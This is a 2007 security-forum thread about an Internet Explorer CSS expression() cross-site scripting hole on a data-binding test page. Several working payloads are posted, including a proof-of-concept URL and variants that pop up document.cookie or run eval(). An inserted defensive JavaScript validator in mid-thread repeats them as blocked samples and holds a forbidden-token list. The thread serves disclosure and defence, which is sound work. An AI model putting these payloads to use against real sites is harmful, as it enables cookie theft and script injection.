Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Data Binding XSS
Posted by: DoctorDan
Date: August 15, 2007 10:56PM

I think that the data binding idea http://www.wisec.it/ph/test.php that Stefano Di Paola came up with is awesome. Because it is so awesome, I felt the need to tinker. I found a vulnerability in the styles. It uses IE's nasty CSS expression()s with a compact if/else statement to execute some JS once (rather than stalling the browser as it usually does). If interested, here's the PoC: http://www.wisec.it/ph/test.php?style=width%3A+expression%28%28window.r%3D%3Ddocument.cookie%29%3F%27%27%3Aalert%28r%3Ddocument.cookie%29%29
The example injection is:
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
Is this an issue that is known of? How can I/should I contact Stefano Di Paola, and is it necessary to do so?

-Dan

EDIT: I forgot to mention that it only works in IE.



Edited 2 time(s). Last edit at 08/15/2007 10:59PM by DoctorDan.

Re: Data Binding XSS
Posted by: tx
Date: August 16, 2007 01:19AM

Nice. I didn't even know JavaScript supported the test ? true : false syntax.

-tx @ lowtech-labs.org

Re: Data Binding XSS
Posted by: Anonymous User
Date: August 16, 2007 05:25AM

Sure, it's just a ternary operation.

Re: Data Binding XSS
Posted by: DoctorDan
Date: August 16, 2007 05:51PM

A more flexible version of the injection is this:
width: expression((window.r==1)?'':eval('r=1;alert("XSS");'))
Using eval() allows us to use several lines (as many as needed) to do what we want, rather than just one.

Thanks, tx. Can I get some input regarding the first post in the topic?

-Dan
EDIT: actually, using an invalid CSS property unfortunately seems to slip by. My comment on it can be found here: http://ha.ckers.org/blog/20070814/preventing-xss-using-data-binding/#comments



Edited 1 time(s). Last edit at 08/16/2007 10:17PM by DoctorDan.

Re: Data Binding XSS
Posted by: acidburn
Date: August 17, 2007 10:37AM

Alternatively, you can do something like this:

background-image:expression(this.runtimeStyle.backgroundImage='none', [insert remaining javascript here])

That will run the JavaScript only once, since it will write over itself with blankness. Or, for shits and giggles, you could write over it with different JavaScript and do that recursively as many times as you please.

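The three injections in this thread (DoctorDan's width: expression() with a ternary, the eval() variant, and acidburn's background-image variant that overwrites its own runtimeStyle) all depend on the same defensive gap: a style parameter reaching an IE page with the property name or the value not being validated, and, as DoctorDan's edit notes, an invalid property name slipping past the filter entirely. The validator below is an added example written for this thread, not code from the wisec.it test page or from anyone posting here. It allowlists property names, normalises the value so that CSS comments and backslash escapes cannot hide a token, and then refuses any value containing expression, behavior, url(, or other script-bearing constructs. ALLOWED_PROPERTIES, FORBIDDEN_TOKENS, normalizeCssValue and validateStyle are hypothetical names chosen for the example.

```javascript
// Added example, not from the thread. Validates a user-supplied inline style
// string (e.g. a ?style= query parameter) before it is echoed into an HTML
// style attribute. All names here are hypothetical.

// Property allowlist: reject anything else, including "invalid" property
// names that IE would still evaluate if the value contains expression().
const ALLOWED_PROPERTIES = new Set([
  'width', 'height', 'color', 'background-color', 'font-size',
  'font-weight', 'text-align', 'margin', 'padding', 'border',
]);

// Tokens that must never survive in a value after normalisation.
const FORBIDDEN_TOKENS = [
  'expression', 'behavior', 'binding', 'url(',
  'javascript:', 'vbscript:', '@import', '<', '>',
];

// Normalise a CSS fragment so that "exp/**/ression" and "expr\65 ssion"
// collapse to "expression" before the token check runs.
function normalizeCssValue(value) {
  let v = value.replace(/\/\*[\s\S]*?\*\//g, '');            // strip /* comments */
  v = v.replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) =>       // decode \HH escapes
    String.fromCodePoint(parseInt(hex, 16)));
  v = v.replace(/\\(.)/g, '$1');                              // decode \x escapes
  v = v.replace(/[\u0000-\u001f\u007f]/g, '');                // drop control chars
  return v.toLowerCase();
}

// Returns { ok: true, declarations: [...] } for a clean style string, or
// { ok: false, reason } naming the first declaration that failed.
function validateStyle(style) {
  const declarations = [];
  for (const raw of style.split(';')) {
    if (raw.trim() === '') continue;
    const idx = raw.indexOf(':');
    if (idx < 0) {
      return { ok: false, reason: 'missing colon in ' + JSON.stringify(raw) };
    }
    const prop = normalizeCssValue(raw.slice(0, idx)).trim();
    const value = normalizeCssValue(raw.slice(idx + 1)).trim();
    if (!ALLOWED_PROPERTIES.has(prop)) {
      return { ok: false, reason: 'property not allowed: ' + prop };
    }
    for (const tok of FORBIDDEN_TOKENS) {
      if (value.includes(tok)) {
        return { ok: false, reason: 'forbidden token ' + tok + ' in ' + prop };
      }
    }
    // Only simple values survive: keywords, numbers, units, %, #hex, commas.
    // Parentheses are deliberately excluded, so any function call is refused.
    if (!/^[a-z0-9#%.,\s-]+$/.test(value)) {
      return { ok: false, reason: 'unexpected characters in ' + prop };
    }
    declarations.push(prop + ': ' + value);
  }
  return { ok: true, declarations };
}

// Constructed sample inputs: the thread's injections plus a benign style.
const SAMPLES = {
  ternary: "width: expression((window.r==document.cookie)?'':alert(r=document.cookie))",
  evalVariant: "width: expression((window.r==1)?'':eval('r=1;alert(\"XSS\");'))",
  runtimeStyle: "background-image:expression(this.runtimeStyle.backgroundImage='none', alert(1))",
  invalidProperty: 'foo: expression(alert(1))',
  commentSplit: 'width: exp/**/ression(alert(1))',
  hexEscape: 'width: expr\\65 ssion(alert(1))',
  benign: 'width: 100px; color: #ff0000',
};

for (const [name, style] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(validateStyle(style)));
}
```

Splitting on semicolons is a deliberate simplification: a value can legitimately contain quoted semicolons, but because quotes and parentheses are refused by the final character check, the split can only ever cause a rejection, never an acceptance. The allowlist is the part that matters for the point raised in this thread: a filter that only blocklists known property names lets an unknown property carrying expression() through, while an allowlist rejects it by default.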
Re: Data Binding XSS
Posted by: hackathology
Date: August 19, 2007 11:41AM

Nice find, neat work.

http://hackathology.blogspot.com

Re: Data Binding XSS
Posted by: teksty32
Date: August 23, 2007 01:26PM

Agreed, and it is a good one:
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
{if possible (best[1])}
http://www.teksty32.com

Re: Data Binding XSS
Posted by: Anonymous User
Date: August 24, 2007 04:26AM

Can't we use this data binding to exploit Firefox, like we discussed lately? I have a sneaking feeling it might be used to probe chrome://
